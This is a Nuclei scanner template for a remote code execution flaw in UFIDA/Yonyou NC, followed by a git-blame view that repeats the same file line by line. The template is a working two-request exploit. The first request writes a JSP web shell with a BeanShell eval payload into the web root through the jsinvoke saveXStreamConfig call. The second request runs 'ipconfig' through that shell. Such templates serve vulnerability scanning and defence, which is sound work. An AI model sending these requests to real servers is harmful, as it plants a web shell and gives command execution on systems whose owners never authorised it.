nuclei-templates/http/cnvd/2023/CNVD-C-2023-76801.yaml

id: CNVD-C-2023-76801

info:
  name: UFIDA NC uapjs - Remote Code Execution
  author: SleepingBag945,s4e-io
  severity: critical
  description: |
    There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
  reference:
    - https://mp.weixin.qq.com/s/8ZRrmUCD2bfznd1MyDDU8A
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="用友-NC-Cloud"
  tags: cnvd,cnvd2023,yonyou,rce,intrusive

variables:
  filename: "{{rand_base(12)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/x-www-form-urlencoded

        {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/{{filename}}.jsp"]}

    matchers:
      - type: dsl
        dsl:
          - "len(body)==0"
          - 'status_code == 200'
        internal: true

  - raw:
      - |
        POST /{{filename}}.jsp?error=bsh.Interpreter HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/x-www-form-urlencoded

        cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ipconfig").getInputStream())

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"Windows", "<?xml", "DNS")'
          - 'status_code == 200 || status_code == 404'
        condition: and
# digest: 4b0a00483046022100a21d5c0aac454d1aa4f09bd6520a56bf881345a46af665d127655c0ab64ca995022100c0fbae12eb60b515d23864acc0aa4db16861b280619da913b14c9f2aaaaaf161:922c64590222798bb761d5b6d8e72950
updated-templates-p 2023-09-17 08:51:38 +00:00			`id: CNVD-C-2023-76801`
Added some Templates 2023-08-18 03:22:06 +00:00
			`info:`
fix 2024-09-10 00:32:30 +00:00			`name: UFIDA NC uapjs - Remote Code Execution`
update CNVD-C-2023-76801 2024-09-10 00:22:04 +00:00			`author: SleepingBag945,s4e-io`
Added some Templates 2023-08-18 03:22:06 +00:00			`severity: critical`
updated matcher 2024-09-10 08:50:03 +00:00			`description: \|`
			`There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.`
update CNVD-C-2023-76801 2024-09-10 00:22:04 +00:00			`reference:`
			`- https://mp.weixin.qq.com/s/8ZRrmUCD2bfznd1MyDDU8A`
TemplateMan Update [Mon Sep 18 12:45:28 UTC 2023] :robot: 2023-09-18 12:45:28 +00:00			`metadata:`
updated matcher 2024-09-10 08:50:03 +00:00			`verified: true`
TemplateMan Update [Mon Sep 18 12:45:28 UTC 2023] :robot: 2023-09-18 12:45:28 +00:00			`max-request: 2`
update CNVD-C-2023-76801 2024-09-10 00:22:04 +00:00			`fofa-query: app="用友-NC-Cloud"`
templateman update 2023-10-14 11:27:55 +00:00			`tags: cnvd,cnvd2023,yonyou,rce,intrusive`
Added some Templates 2023-08-18 03:22:06 +00:00
update CNVD-C-2023-76801 2024-09-10 00:22:04 +00:00			`variables:`
			`filename: "{{rand_base(12)}}"`

			`flow: http(1) && http(2)`

Added some Templates 2023-08-18 03:22:06 +00:00			`http:`
			`- raw:`
			`- \|`
			`POST /uapjs/jsinvoke/?action=invoke HTTP/1.1`
			`Host: {{Hostname}}`
update CNVD-C-2023-76801 2024-09-10 00:22:04 +00:00			`Content-type: application/x-www-form-urlencoded`

			`{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/{{filename}}.jsp"]}`

			`matchers:`
			`- type: dsl`
			`dsl:`
updated matcher 2024-09-10 08:50:03 +00:00			`- "len(body)==0"`
update CNVD-C-2023-76801 2024-09-10 00:22:04 +00:00			`- 'status_code == 200'`
			`internal: true`
Added some Templates 2023-08-18 03:22:06 +00:00
update CNVD-C-2023-76801 2024-09-10 00:22:04 +00:00			`- raw:`
Added some Templates 2023-08-18 03:22:06 +00:00			`- \|`
update CNVD-C-2023-76801 2024-09-10 00:22:04 +00:00			`POST /{{filename}}.jsp?error=bsh.Interpreter HTTP/1.1`
Added some Templates 2023-08-18 03:22:06 +00:00			`Host: {{Hostname}}`
update CNVD-C-2023-76801 2024-09-10 00:22:04 +00:00			`Content-type: application/x-www-form-urlencoded`

			`cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ipconfig").getInputStream())`
Added some Templates 2023-08-18 03:22:06 +00:00
			`matchers:`
			`- type: dsl`
			`dsl:`
update CNVD-C-2023-76801 2024-09-10 00:22:04 +00:00			`- 'contains_all(body,"Windows", "<?xml", "DNS")'`
			`- 'status_code == 200 \|\| status_code == 404'`
Added some Templates 2023-08-18 03:22:06 +00:00			`condition: and`
chore: sign templates 🤖 2024-09-10 09:49:25 +00:00			`# digest: 4b0a00483046022100a21d5c0aac454d1aa4f09bd6520a56bf881345a46af665d127655c0ab64ca995022100c0fbae12eb60b515d23864acc0aa4db16861b280619da913b14c9f2aaaaaf161:922c64590222798bb761d5b6d8e72950`